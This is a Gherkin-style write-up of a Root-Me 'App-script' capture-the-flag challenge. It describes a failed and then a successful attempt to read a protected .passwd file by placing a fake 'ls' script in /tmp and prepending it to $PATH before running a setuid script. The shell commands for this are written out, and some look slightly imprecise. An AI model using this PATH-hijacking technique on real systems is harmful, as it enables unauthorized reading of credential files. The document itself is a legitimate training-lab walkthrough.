## Version 2.0
## language: en
Feature: 02-app-script-www.root-me.org
  Code:
    02
  Site:
    www.root-me.org
  Category:
    App-script
  User:
    juan6630
  Goal:
    Retrive the password.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows 10      | 20H2        |
    | Mozilla Firefox | 85.0.2      |
  Machine information:
    Given I start the challenge with the following URL
    """
    http://webssh.root-me.org/?location=WebSSH_205&ssh=ssh://app-script
    -ch12:app-script-ch12@challenge02
    """
    When I access a machine via SSH
    Then I see the challenge information
    """
    -----------------------------------
    Welcome on challenge02        /
    -----------------------------‘
    /tmp and /var/tmp are writeable
    Validation password is stored in $HOME/.passwd
    """

  Scenario: Fail: Exploit $PATH variable
    Given The password information
    And I read about <<$PATH>> and <<setuid scripts>>
    When I use <<ls -lA>> for extra info
    Then I get the output [evidence](files.png)
    And I decided that I can use the writeable folder <</tmp>>
    When I create a new folder using
    """
    mkdir /tmp/juan/
    """
    And I create a new script with
    """
    echo '#!/bin/sh'
    echo 'cat' /challenge/app-script/ch12/.passwd>/tmp/juan/ls
    """
    When I make the file executable with
    """
    chmod +x /tmp/juan/ls
    """
    And I set a new Path variable to the directory
    Then My new $PATH is [evidence](path.png)
    When I execute the challenge script
    Then I get an error [evidence](fail.png)

  Scenario: Success: Exploit $PATH variable
    Given The password information
    And I double-check the info about the <<.passwd>> path
    When I add a new line to the script with
    """
    echo 'cat'$HOME/.passwd>/tmp/juan/ls
    """
    And I run the script
    Then I get the flag [evidence](flag.png)
    And I solve the challenge
